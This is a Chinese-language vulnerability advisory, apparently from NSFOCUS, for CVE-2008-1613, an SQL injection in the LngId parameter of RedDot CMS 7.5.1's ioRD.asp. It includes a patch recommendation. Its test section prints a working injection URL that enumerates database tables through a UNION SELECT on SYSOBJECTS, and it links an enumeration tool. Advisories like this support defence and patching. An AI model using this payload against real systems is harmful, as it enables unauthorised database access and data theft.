首页 -> 安全研究

安全研究

安全漏洞
RedDot CMS ioRD.asp文件SQL注入漏洞

发布日期:2008-04-21
更新日期:2008-04-23

受影响系统:
RedDot CMS 7.5.1
不受影响系统:
RedDot CMS 7.5.1.86
描述:
BUGTRAQ  ID: 28872
CVE(CAN) ID: CVE-2008-1613

RedDot CMS是一款网站内容管理系统。

RedDot CMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞执行SQL注入攻击。

传送给RedDot CMS的IoRD.asp文件的LngId参数负责分配CMS应用的语言环境。由于没有正确地验证该参数便在SQL语句中使用,因此远程攻击者可以通过SQL注入攻击绕过限制访问数据库,从数据库中枚举信息。

<*来源:Mark Crowther (mark.crowther@irmplc.com
  
  链接:http://marc.info/?l=bugtraq&m=120879650625447&w=2
        http://secunia.com/advisories/29843/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://vulnerablehost.com:443/cms/ioRD.asp?Action=ShowMessage&LngId=ENG.DGC0 FROM IO_DGC_ENG UNION SELECT min(name) FROM SYSOBJECTS where xtype=char(85) and name> '' ORDER BY 1;-- &DisableAutoLogin=1

http://www.irmplc.com/Tools/RDdbenum.py

建议:
厂商补丁:

RedDot
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.reddot.com/products_web_content_management.htm

浏览次数:4233
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障